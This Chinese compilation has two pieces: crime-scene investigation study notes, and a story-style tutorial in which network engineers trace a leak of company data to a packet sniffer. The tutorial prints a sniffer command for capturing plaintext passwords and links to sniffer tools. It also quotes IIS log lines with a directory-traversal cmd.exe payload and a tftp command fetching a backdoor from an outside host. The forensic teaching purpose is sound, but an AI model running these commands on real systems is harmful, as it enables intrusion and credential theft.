犯罪现场调查手记

犯罪现场调查手记（精选2篇）

1.犯罪现场调查手记 篇一

犯罪现场勘查

第一章 犯罪现场

1.犯罪现场：是指犯罪行为人实施犯罪活动的地点和遗留有与犯罪有关的痕迹物品的一切场所。

2.犯罪现场的构成

⑴、时间、空间要素，基本要素；

⑵、犯罪行为要素，本质要素； ⑶、物质变化要素：

3、犯罪现场的特点：现场形态的暴露性与因果联系的隐蔽性；

犯罪现场的整体性与形成过程的阶段性；

同类现场的共同性与个案现场的特殊性。

4、犯罪现场的分类

⑴、根据犯罪现场形成后有无变动:原始现场、变动现场；

⑵、根据现场在案件形成过程中的地位和作用：主体现场、关联现场；

⑶、根据现场的真伪性质及其伪装程度：伪装现场、伪造现场；

（附：两种现场本质区别：有无犯罪行为的存在。）

⑷、静态现场、动态现场；

⑸、根据犯罪现场所处空间是否具有封闭性：室内现场、室外现场；

⑹、根据犯罪现场以及遗留痕迹、物证所在处所的空间大小：宏观现场、围观现场。

第二章 现场保护

1、现场保护：指在案件发生后，为了维护犯罪现场的秩序与安全，使犯罪现场的痕迹、物证免遭破坏，先期到达现场的公安保卫人员在犯罪现场及周围实施封锁、警戒等一系列保护措施的总称。

2、现场保护中的紧急措施：

⑴、急救人命；⑵、扑灭火险；⑶、制止犯罪；⑷、排除障碍。

3、现场保护的任务：⑴、核实情况，迅速上报；

⑵、划定范围，布置警戒；

⑶、采取紧急措施；

⑷、收集对案件的反映；

⑸、对侦查人员的汇报；

⑹、收集周围人员情况信息。

4、现场保护的方法：

⑴、痕迹物品的保护：标示法、记录法、遮盖法、转移法、板桥法、提取法。

⑵、水中尸体的保护：静水无需打捞；

有冲走危险应固定或打捞上岸后遮盖保护。

⑶、火场尸体的保护：尸体有被烧毁或被倒塌的砖石覆盖危险，应设法将尸体

移出火场保存。

⑷、吊挂尸体的保护：剪断绳索要点有二：①、下面有人托住；②避开绳结及

身体接触的部位剪断

5、现场保护的意义：⑴、有利于查明现场内发生的犯罪行为；

⑵、有利于收集犯罪证据和发现侦查线索；

⑶、有利于保守现场勘查工作的秘密；

6、现场保护的原则：⑴、迅速及时；⑵、救助优先；

⑶、尽可能保持现场原始状态。

第三、四章 现场勘查

1、现场勘查：指刑事案件发生后，侦查人员为了查明犯罪事实，发现侦查线索，收集犯罪证据，依法运用一定的策略方法和刑事技术手段，对与犯罪有关的场所、物品、人身和尸体等进行勘验、检查，对被害人、事主和其他知情人进行调查询问的一项初动侦查活动。

2、现场勘查的任务：

（1）查明事件和案件性质（2）查明犯罪活动情况（3）发现提取犯罪证据（4）固定犯罪现场状况（5）确定侦查方向和范围

3、现场勘查的要求：

及时、全面、细致、客观、合法、安全

4、侦查人员执行勘查任务时应当佩戴由公安机部统一制发的《刑事案件现场勘验检查证》

5、现场勘查的意义：⑴、现场勘查是刑事案件侦查的起点和基础；

⑵、现场勘查是发现侦查线索和收集破案证据的重要手段；

⑶、现场勘查所获的情况是侦查破案的客观依据。

6、见证人：勘验、检查现场时应当邀请一至二名与案件无关的公民作见证人。

不能作为见证人的情况：

（1）与案件有关的当事人、被害人及其近亲属

（2）在职的检察人员、审判人员、公安人员或刑事技术鉴定人员（3）有犯罪嫌疑或因违法犯罪受过打击处理的人员（4）未成年人

（5）精神上、生理上有缺陷，不能辨别是非、不能正确履行见证义务的人员

（6）发案地临时居住人员

7、现场勘查指挥员的条件：一是具备人民警察的身份；二是具有现场勘查的专业知识；三是具有一定的组织指挥能力。

8、现场勘查的最低权限是县级公安机关。

9、现场勘查的其他参与人员：邀请的见证人、商请的检察官、聘请的具有专门知识的人 第五章 现场访问

1、现场访问：是指侦查人员在现场勘查过程中，未查明案情，收集侦查线索和证据，就案件的发生、发现等情况，依法对有关人员进行查访、询问的一项专门侦查活动。

3、现场访问的意义: ⑴、为及时采取紧急措施提供依据；

⑵、为划定勘验范围、确定勘验重点提供依据； ⑶、与实地勘验材料相互印证，及时补漏； ⑷、有利于正确的分析判断案情；

⑸、有利于获取犯罪证据。

4、现场访问的对象

根据访问对象与现场或案件关系的远近划分: 第一层次访问对象：发现人和报案人；

第二层次访问对象：被害人及其家属、关系亲近的人、被害单位的直接负责人； 第三层次访问对象：其他知情人。

5、现场访问的内容

（1）刑事案件发现和发生的时间、地点、详细经过，发现后采取的保护措施，现场所见情况，有无可疑人或其他人在现场，现场有无反常情况，以及物品损失等情况。

（2）现场可疑人或作案人数、作案人性别、年龄、口音、身高、体态、相貌、衣着打扮、携带物品及特征，来去方向、路线。（3）与刑事案件现场、被害人有关的其他情况

6、现场访问的原则：个别访问原则；及时访问原则；依法访问原则

7、现场访问的要求：及时询问、个别询问、告知访问对象其权利和义务、遵循权限和数量要求

第六章 现场勘验

1、现场勘验：又称实地勘验，是侦查人员为了发现、收集侦查线索和犯罪证据，查明案情，揭露证实犯罪，借助感觉器官和各种科学技术手段，对与犯罪有关的场所和存在于这些场所中的痕迹、物品、尸体及人身等客体所进行的勘验、检查活动。

2、现场勘验的对象（93）：犯罪场所；犯罪痕迹；犯罪遗留物；

尸块、尸体；相关的人身检查。

3、现场勘验的步骤：⑴整体巡视;⑵初步勘验；

⑶详细勘验； ⑷结束勘验。※

4、现场勘验的常采取顺序（P102）

⑴、由中心向外围勘验；

⑵、由外围向中心勘验；

⑶、沿着作案人的行走路线勘验；

⑷、从犯罪的出入口处进行勘验；

⑸、分片、分段、分层勘验；

⑹、从某个特定部位开始勘验

5、个体勘验的原则：⑴、先静观后动手；⑵、先固定后提取；

⑶、先地面后高处；⑷、先外表后内部；

⑸、先重点后一般；⑹、先易逝后稳定。

6、现场勘验的方法：观察法、比较研究法、检测法、实验法

7、实验法：在现场勘查的过程中，侦查机关为了确定与案件有关的某一事实或现象发生或存在的客观可能性及其方式，依法将该事实或现象参照案件原有的条件重新加以演示的侦查活动

8、实验法的要求：

县级批准、见证人在场、与案件条件相近、反复多次实验、有伤风化的情况不能做、实验做完要制作现场实验记录 第十一章 现场分析

1、现场分析：是指现场勘查指挥员在现场勘查基本结束后，组织全体勘查人员根据现场访问和实地勘验所获得的材料，对现场和案件情况以及初步侦查方案等问题进行分析研究，并作出判断的一项侦查活动。

2、现场分析概念理解（特点）

⑴、现场分析的时间具有特定性； ⑵、参加现场分析的人员具有复杂性

⑶、现场分析的内容具有广泛性；

⑷、现场分析的性质具有法定性。

3、现场分析的任务：⑴、全面了解、掌握现场情况；

⑵、对案件的有关问题进行分析判断；

⑶、弥补现场勘查前期工作的失误与不足；

⑷、决定初步应采取的侦查措施；

⑸、做好现场的善后处理。

4、现场分析的步骤：⑴、汇集材料；⑵、鉴别材料；⑶、分析判断。

方法：⑴、单项剖析；⑵、综合分析；⑶、逻辑推理。

5、现场分析的内容

⑴、分析判断案件性质

①、分析事件性质（罪与非罪界定）：

一、根据实地勘验的情况分析；

二、根据现场访问情况分析；

三、根据实验结果分析；

四、根据检验鉴定结论分析。②、确定案件性质（刑事案件）：

一、根据受害单位或受害人的情况分析；

二、根据现场的具体情况分析；

三、根据事主、受害人及其亲属和有关人员提供的情况分析；

四、根据现场上所反映出的各种迹象分析。⑵、分析判断作案时间

①、根据事主、被害人、目击者及其他知情群众提供的情况分析； ②、根据现场上记载时间的物品所表明的时间分析； ③、根据现场上痕迹的新旧程度和有关物品的状态分析； ④、根据尸体现象及胃内容物消化程度分析； ⑤、根据天气变化情况分析；

⑥、根据现场所处环境、交通状况分析； ⑦、根据现场实验的结果分析；

⑧、根据事主、受害人、周围群众的生活习惯分析；

⑨、根据破坏现场障碍物的工程量大小及被盗财物的数量和被害人的人数进行分析。

⑶、分析判断作案地点

①、根据现场访问所获得的情况分析； ②、根据现场所处的地理位置和环境分析； ③、根据现场上发现的各种痕迹物证分析； ④、根据尸体包裹物分析（反常情况）； ⑤、根据尸检提供的各种信息分析。⑷、分析判断作案工具

①、根据被害人、知情人提供的情况分析； ②、根据现场遗留的工具痕迹分析；

③、根据现场遗留的可疑工具及其与作案工具相关的物品分析； ④、根据现场犯罪痕迹内外的各种微量物质分析。

PS：解决两问题：a.分析是否为原始现场；b.分析与作案人之间的关系。⑸、分析判断作案人数

①、根据受害人、知情人提供的情况分析； ②、根据现场上发现的痕迹分析； ③、根据现场上的遗留物分析； ④、根据犯罪的行为和结果分析。

⑹、分析判断作案人的特征（主要三方面）①、犯罪分子的自然特征条件；

内容：体貌、衣着、习惯、嗜好等。②、犯罪分子的社会特征条件；

内容：

一、社会身份、职业特征；

二、居住状况；三是否惯犯。③、犯罪分子作案的必备条件。

内容：从持枪条件、具备和使用爆炸物条件、特殊技能、知情程度、体能状况、交通工具、作案工具等方面综合分析。

⑺、分析判断作案过程

①、根据受害人、知情人的陈述分析； ②、根据现场上遗留的各种痕迹特征分析； ③、根据现场上物品陈设情况分析。⑻、分析判断作案人的作案动机目的 ①、根据被害人的情况分析；

②、根据作案的中心目标、目的物及产生的后果分析； ③、根据作案人作案手法和现场上的活动过程分析。⑼、分析判断被害人的背景 ①、分析被害人的被害情况； ②、分析被害人的职业身份； ③、分析被害人的人际交往； ④、分析被害人的家庭关系； ⑤、分析被害人的经济情况。

6、侦查方向：指侦查工作中应该在哪些人员中展开排查

7、确定侦查方向的依据：（210）（1）根据案件性质确定。（如同为杀人案件，奸情杀人案件的侦查方向为与被害人或其配偶有不正当两性关系的人，报复杀人案的侦查方向为与被害人生前有利害冲突关系的人）（2）根据作案人人身形象特征确定

（3）根据作案人对现场及被害人的熟悉程度确定（4）根据作案人的行踪、动向确定

8、侦查范围: 指地域范围和职业范围

9、确定侦查范围的依据（211）

（1）根据作案人的作案时间选择、空间构型来确定（2）根据现场上遗留的痕迹、物品确定。（3）根据作案手段和方法确定

（4）根据赃款、赃物的可能去向确定（5）根据作案人的穿戴、语言等特征分析 名词解释 犯罪现场：是指犯罪行为人实施犯罪活动的地点和遗留有与犯罪有关的痕迹物品的一切场所。

现场保护：指在案件发生后，为了维护犯罪现场的秩序与安全，使犯罪现场的痕迹、物证免遭破坏，先期到达现场的公安保卫人员在犯罪现场及周围实施封锁、警戒等一系列保护措施的总称。

现场勘查：指刑事案件发生后，侦查人员为了查明犯罪事实，发现侦查线索，收集犯罪证据，依法运用一定的策略方法和刑事技术手段，对与犯罪有关的场所、物品、人身和尸体等进行勘验、检查，对被害人、事主和其他知情人进行调查询问的一项初动侦查活动。

现场访问：是指侦查人员在现场勘查过程中，未查明案情，收集侦查线索和证据，就案件的发生、发现等情况，依法对有关人员进行查访、询问的一项专门侦查活动。

现场勘验：又称实地勘验，是侦查人员为了发现、收集侦查线索和犯罪证据，查明案情，揭露证实犯罪，借助感觉器官和各种科学技术手段，对与犯罪有关的场所和存在于这些场所中的痕迹、物品、尸体及人身等客体所进行的勘验、检查活动。

实验法： 在现场勘查的过程中，侦查机关为了确定与案件有关的某一事实或现象发生或存在的客观可能性及其方式，依法将该事实或现象参照案件原有的条件重新加以演示的侦查活动

现场分析：是指现场勘查指挥员在现场勘查基本结束后，组织全体勘查人员根据现场访问和实地勘验所获得的材料，对现场和案件情况以及初步侦查方案等问题进行分析研究，并作出判断的一项侦查活动。

2.犯罪现场调查 篇二

1 网络安全工程师如何处理公司信息泄露的技术

2 如何解决保护服务器日志技巧

3 掌握分析攻击者入侵行为的技巧

什么是Sniffer

Sniffer(嗅探)是一种常用的收集有用数据方法，这些数据可以是用户的账号和密码，可以是一些商用机密数据，也可以是检测内网错误信息等等。最主要应用于管理人员监视公司网络，并可以随时掌握网络的实际情况。在网络性能急剧下降的时候，可以通过Sniffer工具来分析原因，找出造成网络阻塞的来源。当然嗅探也是一把双刃剑，被恶意攻击者利用的话就可能窃取公司机密信息，就如同这次公司档案外泄的案件就是被攻击者在内网使用嗅探技术得到内网中的公共信息导致的。

为什么机密信息也能截获？

Sniffer工作在网络环境中的底层，它会拦截所有的正在网络上传送的数据，并且通过相应的软件处理，可以实时分析这些数据的内容，进而分析所处的网络状态和整体布局，通过Sniffer可以轻易地得到非加密处理的内网中很多机密信息。

容易泄露的秘密

1.口令:这是攻击者使用Sniffer的必然因素，由于Sniffer可以记录到明文传送的userid(用户名)和passwd(密码)，我们的服务器管理账号就是在这里被攻击者截取的。

2.金融账号:现在公司很多时候需要在网上使用自己的信用卡或现金账号，然而Sniffer可以很轻松截获在网上传送的用户姓名、口令、信用卡号码、截止日期、账号和pin.

3.邮件和协同办公数据:通过拦截数据包，入侵者可以很方便记录别人之间敏感的信息传送，或者干脆拦截整个的E-mail会话过程。一些公司员工的协同办公数据丢失。

Sniffer工具下载

Sniffer: http://download.enet.com.cn/html/211902001032602.html

MSN Chat Monitor & Sniffer:http://down1.tech.sina.com.cn/download/downContent/2005-03-01/13154.shtml

重要提示:Sniffer软件运行有一定风险，同时对局域网会有比较大的负面影响，有可能会拖慢整个网络，请您慎重选用。

★小编有话说：“天生我才之网络天才”栏目，已经伴随着读者朋友走过了近一年的时间，相信坚持阅读这个栏目的朋友已经初步掌握了网管所需要的一些技能。同时，有一些朋友已经不满足于现状，希望学习更高一级的网络安全工程师的内容。为此，我们决定将“网络天才”定位到“网络安全工程师”，我们专门找到了具有丰富实战经验的网络安全工程师，请他们给您实战演示一下真正的“黑客对抗”！本期我们的话题将是“偷窥”技术……

周日的下午，CSI集团的网络安全工程顾问——“白大虾”与几位同行相约在一个幽静的小酒吧里聚首。当“白大虾”赶到酒吧时，听到以前共事的老朋友正在神侃一段当年自己侦破公司内部资料失窃的光辉历史……

机密被盗

那是两年前的事情了，小白刚刚开始从事网络安全分析师这份工作就遇到棘手的工作。也是一个周日的下午，公司副总裁忽然气急败坏的打电话到网络部吼到:“你们网络部的技术员都是吃白饭的啊！公司的客户列表居然被对手拿到了，限你们1天内把情况搞清楚，否则全部滚蛋！”

公司有“内鬼”？

工程师老刘听到副总的暴怒的内容脑子中闪现出:“内网嗅探数据劫持”。只有公司内部的员工计算机才有可能访问到内网服务器获取重要的信息资料，但是公司内应该没有这种级别的计算机知识人员啊。老刘带着小白进入机房打开服务器细心地检查起来。半个小时过去了，老刘松了一口气说:“终于找到原因了，还好没造成很大的损失。”这次事故估计是竞争对手搞的小动作，攻击者通过WEB服务器进入内网后利用嗅探技术窃取了客户列表，但是由于WEB服务器不是域网关，权限不够，所以没有拿到客户完整资料。由此可以确定不是公司内部员工出的问题，公司分配给WEB服务器的权限远小于数据服务器，而有机会接触服务器的人都有读取数据库的权限。

★思路总结:

只丢失部分资料→用户权限不足→不是“内鬼”→权限较小的服务器是什么？→Web服务器可能最大→能接触Web服务器的人有嫌疑。

顺藤摸瓜

“噢，我明白了，这次公司资料外泄的最大元凶就是嗅探导致的了！但是攻击者是如何进行的嗅探呢？”小白问到。“恩，跟我来，在服务器上我给你讲解一下。”老刘打开10.4.1.1(域网关服务器)，说到:“Sniffer在内网工作时，要求嗅探程序运行在网关服务器上才能完全收集到所有(10.4.1.1～10.4.1.255)内网用户的信息。根据Sniffer的工作原理可知道，这次针对公司数据的攻击者是在得到内网服务器的权限后才实现的信息窃取。我们来模拟一下黑客攻击的过程:

在服务器上打开cmd命令行中运行一个功能简易的嗅探器X-sinffer，这个工具可捕获局域网内FTP/SMTP/POP3/HTTP协议的明文密码(见图1)。执行以下命令:xnsiff.exe -pass -hide -log pass.log(见图2)

“小白，你去10.4.1.101计算机上登录到公司的协同办公系统中，向服务器发送一份公司产品报价单。”看到没有，在Sniffer运行的目录下生成的pass.log文档中有如下记录:

19:2710.4.1.101 uiD:xiaobai pass:acttdr

19:2710.4.1.1 houD:baojia.doc to 10.4.1.101 uiD:xiaobai pass:acttdr

“看到了吗？你登录在101上计算机上的用户名和密码都被纪录下来，并且操作行为也有记录。当攻击者得到本地协同办公的登录密码后，就可以进入公司的办公系统，从而轻易获取公司信息。就是这种最简单的内网嗅探攻击行为截取了公司内办公时传送的客户列表。”

图1

图2

★思路总结:

嗅探工具截获了协同办公的密码→进入公司内网→获得客户列表。

白色档案——日志分析

“哦，我大概明白了嗅探的攻击作用，但你又是如何判断到攻击者的攻击行为的呢?”小白又提出新的疑问。“呵呵，那是分析日志得到结果。”老刘分别打开服务器上的多个日志文件:

IIS日志保存在C:winntsystem32LogFilesw3svc1(默认C盘为系统盘的路径)。IIS日志是记录攻击者在对服务器上的网页进行的扫描操作等行为描述。让我们来看看这次的攻击者是怎么入侵公司服务器的:

攻击者向网页服务器提出要求，让服务器送回本身的版本信息:(一般会使用nc.exe探测)

C:>nc -n 10.0.2.55 80

……

Server: Microsoft-IIS/5.0

DatE: Sun， 08 Mar 2007 14:31:00 GMT

……

通过上述信息，攻击者可以确定服务器使用的Windows 2000+IIS5.0系统，进而发动了利用漏洞的入侵。攻击者如果查看本地服务上的目录文件，则日志中会记录下此访问行为:

2007-03-01 08:47:47 202.99.16.17 - 10.4.1.100 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir 200 -

通过日志我们可以看到攻击者202.99.16.17利用本地的cmd.exe察看了系统盘内有什么文件。

2007-03-01 08:59:04 202.99.16.17 - 10.4.1.100 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+tftp%20-i%2061.48.10.129%20GET%20cppce.dll%20C:httpodbc.dll

502 -

这里可以看到攻击者利用tftp向61.48.10.129服务器传送了cppce.dll后门。攻击者利用serv-u溢出漏洞攻击服务器，并获取了用户权限。

“这次被入侵的根源已经被找到了，必须要把公司里的安全系统从新整理升级一下。小白有时间多看看入侵案例，从明天开始我带你一起完整地做一次公司的安全规划。”

小提示:Windows的系统重要日志

安全日志文件:%systemroot%system32config SecEvent.EVT

系统日志文件:%systemroot%system32config SysEvent.EVT

应用程序日志文件:%systemroot%system32config AppEvent.EVT

FTP连接日志和HTTPD事务日志:%systemroot% system32LogFiles，

打开注册表HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog位置，下面的Application、Security、System几个子键，分别对应“应用程序日志”、“安全日志”、“系统日志”。修改注册表的Application、System等子键（见图3）。

图3

★思路总结：